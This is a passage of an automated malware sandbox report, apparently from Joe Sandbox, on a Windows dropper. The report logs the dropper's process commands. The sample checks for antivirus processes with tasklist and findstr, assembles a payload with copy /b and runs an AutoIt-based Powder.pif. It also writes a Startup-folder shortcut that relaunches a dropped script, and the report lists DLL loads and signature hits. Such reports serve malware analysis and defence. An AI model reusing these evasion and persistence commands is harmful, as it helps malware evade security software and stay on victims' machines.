Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2F409	10_2_00E2F409
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E0F6A0	10_2_00E0F6A0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E216B4	10_2_00E216B4
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E01663	10_2_00E01663
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E1F628	10_2_00E1F628
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E278C3	10_2_00E278C3
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2DBA5	10_2_00E2DBA5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E21BA8	10_2_00E21BA8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E39CE5	10_2_00E39CE5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E1DD28	10_2_00E1DD28
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E21FC0	10_2_00E21FC0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2BFD6	10_2_00E2BFD6
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008EB020	16_2_008EB020
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008E94E0	16_2_008E94E0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008E9C80	16_2_008E9C80
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009023F5	16_2_009023F5
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00968400	16_2_00968400
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00916502	16_2_00916502
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008EE6F0	16_2_008EE6F0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0091265E	16_2_0091265E
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090282A	16_2_0090282A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009189BF	16_2_009189BF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00960A3A	16_2_00960A3A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00916A74	16_2_00916A74
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008F0BE0	16_2_008F0BE0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0093EDB2	16_2_0093EDB2
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090CD51	16_2_0090CD51
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00960EB7	16_2_00960EB7
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00948E44	16_2_00948E44
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00916FE6	16_2_00916FE6
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009033B7	16_2_009033B7
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090F409	16_2_0090F409
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008FD45D	16_2_008FD45D
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009016B4	16_2_009016B4
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008EF6A0	16_2_008EF6A0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008FF628	16_2_008FF628
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008E1663	16_2_008E1663
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009078C3	16_2_009078C3
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090DBA5	16_2_0090DBA5
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00901BA8	16_2_00901BA8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00919CE5	16_2_00919CE5
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008FDD28	16_2_008FDD28
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090BFD6	16_2_0090BFD6
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00901FC0	16_2_00901FC0

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: String function: 00908B30 appears 42 times
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: String function: 008F1A36 appears 34 times
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: String function: 00900D17 appears 70 times
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: String function: 00E28B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: String function: 00E20D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: String function: 00E11A36 appears 34 times

PE / OLE file has an invalid certificate

Source: cW5i0RdQ4L.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: cW5i0RdQ4L.exe, 00000000.00000003.1718798181.0000000000644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs cW5i0RdQ4L.exe
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAutoIt3.exeB vs cW5i0RdQ4L.exe
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719275870.0000000000644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs cW5i0RdQ4L.exe

Uses 32bit PE files

Source: cW5i0RdQ4L.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: cW5i0RdQ4L.exe

Static PE information: Section: .reloc ZLIB complexity 1.002685546875

Source: classification engine

Classification label: mal96.expl.evad.winEXE@28/18@3/1

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E6A6AD GetLastError,FormatMessageW,

10_2_00E6A6AD

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E58DE9 AdjustTokenPrivileges,CloseHandle,	10_2_00E58DE9
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E59399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	10_2_00E59399
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00938DE9 AdjustTokenPrivileges,CloseHandle,	16_2_00938DE9
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00939399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	16_2_00939399

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E64148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

10_2_00E64148

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E6443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

10_2_00E6443D

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

File created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

File created: C:\Users\user\AppData\Local\Temp\nsk814.tmp

Jump to behavior

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat

Source: cW5i0RdQ4L.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cW5i0RdQ4L.exe

Virustotal: Detection: 13%

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

File read: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\cW5i0RdQ4L.exe "C:\Users\user\Desktop\cW5i0RdQ4L.exe"
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif n
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & echo URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js"
Source: C:\Windows\SysWOW64\findstr.exe	Process created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif n	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & echo URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & exit	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"	Jump to behavior

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: wininet.dll	Jump to behavior
